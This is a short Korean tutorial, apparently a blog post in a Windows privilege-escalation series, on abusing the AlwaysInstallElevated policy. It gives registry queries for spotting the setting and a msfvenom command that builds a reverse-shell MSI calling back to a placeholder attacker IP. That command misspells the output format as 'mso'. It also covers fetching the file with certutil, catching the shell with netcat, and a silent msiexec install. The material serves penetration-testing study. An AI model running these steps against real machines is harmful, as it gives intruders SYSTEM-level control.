윈도우 권한상승 #3 Always Install Elevated

윈도우 환경은 일반 유저가 시스템 권한으로 Microsoft Windows Installer 패키지(MSI)를 설치할 수 있는 그룹 정책 설정을 제공합니다. 이 문제는 일반 유저가 시스템 권한이 필요한 응용 프로그램을 설치하려고 하고 관리자가 사용자에게 임시 로컬 관리자 액세스 권한을 부여하지 않으려는 환경에서 발견될 수 있습니다.

해커가 AlwaysInstallElevated 그룹 정책을 발견했을 때 그것을 권한을 상승시키기 위해 악용할 수 있습니다.

 

AlwaysInsatllElevated가 매우 위험하기 때문에 윈도우도 그 사용을 권장하지 않으며 일반 유저에게 admin 권한을 주는 것과 다를 것이 없다고 합니다. 

 

재밌는 파트로 넘어가자면요... :)

 

winpeas.exe를 돌려보면 다음과 같은 output을 받습니다. HKLM과 HKCU를 확인하는 것이 보이기 때문에 winpeas 말고도 다른 방법도 있습니다.

다음 명령어로 직접 registry를 확인할 수 있습니다.

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

악성 .msi 파일을 msfvenom으로 만들 수 있습니다:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[해커아이피] LPORT=[원하는포트] -f mso > reverse.msi

certutil.exe로 다운로드하고 실행시키고 netcat으로 shell을 캐치하면 됩니다.

msiexec /quiet /qn /i [파일이름].msi

argument들은 무슨 뜻이냐면:

quiet: 정숙 모드. 유저 상호작용이 없다.
qn: 설치 과정에 UI(user interface)가 없다.